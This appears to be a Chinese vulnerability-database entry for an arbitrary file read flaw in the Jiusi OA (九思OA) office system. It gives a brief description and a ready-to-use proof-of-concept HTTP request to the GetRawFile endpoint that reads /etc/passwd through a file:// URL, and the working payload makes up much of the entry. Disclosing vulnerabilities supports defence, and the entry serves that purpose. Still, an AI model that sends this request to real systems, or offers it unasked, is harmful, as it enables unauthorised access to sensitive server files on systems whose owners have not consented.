九思OA GetRawFile 任意文件读取漏洞

日期: 2022-12-14 | 影响软件: 九思OA | POC: 已公开

漏洞描述

九思OA系统是安装、实施、学习、操作、维护的OA系统。 九思OA系统存在任意文件读取漏洞。允许攻击者利用漏洞获取敏感信息。

PoC代码

GET /jsoa/GetRawFile?url=file:///etc/passwd HTTP/1.1
Host: 
Accept: */*

相关漏洞推荐